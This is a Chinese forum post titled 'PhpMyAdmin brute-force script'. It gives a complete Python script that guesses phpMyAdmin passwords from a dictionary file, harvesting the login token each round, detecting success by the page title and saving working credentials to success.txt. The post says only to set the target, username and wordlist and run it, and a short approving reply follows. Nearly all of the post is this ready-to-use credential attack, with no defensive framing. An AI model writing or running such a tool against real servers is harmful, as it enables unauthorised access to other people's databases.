PhpMyAdmin爆破脚本
修改 target, user, passdic 三个参数,然后直接运行即可,如果爆破成功会把结果写到success.txt文件里#!/usr/bin/python3
#
from requests import session
from re import findall
from html import unescape
#
# PMA地址,例如 http://localhost/index.php
target = 'http://localhost/index.php'
# 要爆破的用户名
user = 'root'
# 密码字典文件路径
passdic = 'password.txt'
#
ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
def get_token(text) -> str:
'''获取token'''
token = findall("name=\"token\" value=\"(.*?)\" />", text)
return unescape(token) if token else None
def get_title(text) -> str:
'''获取标题'''
title = findall('<title>(.*)</title>', text)
return title if title else None
def try_login(user, pwd, token):
'''尝试登陆'''
data = {'pma_username': user,
'pma_password': pwd,
'server': 1,
'target': 'index.php',
'token': token}
r = ss.post(url=target, data=data)
return r.text
def fuck_pma():
'''爆破'''
with open(passdic, 'r', encoding='utf-8') as f:
html = try_login('', '', '')
title_fail = get_title(html)
token = get_token(html)
for line in f:
pwd = line.strip()
print(f'[?] 尝试登陆{user}{pwd}')
html = try_login(user, pwd, token)
title = get_title(html)
token = get_token(html)
if title != title_fail:
print(f'[√] 登陆成功{title}')
with open('success.txt', 'a', encoding='utf-8') as f:
f.write(f'{target}|{user}|{pwd}\n')
break
else:
print(f'[×] 登陆失败{title}')
if __name__ == "__main__":
try:
fuck_pma()
except Exception as e:
print(e)
学习了666666666
页:
[1]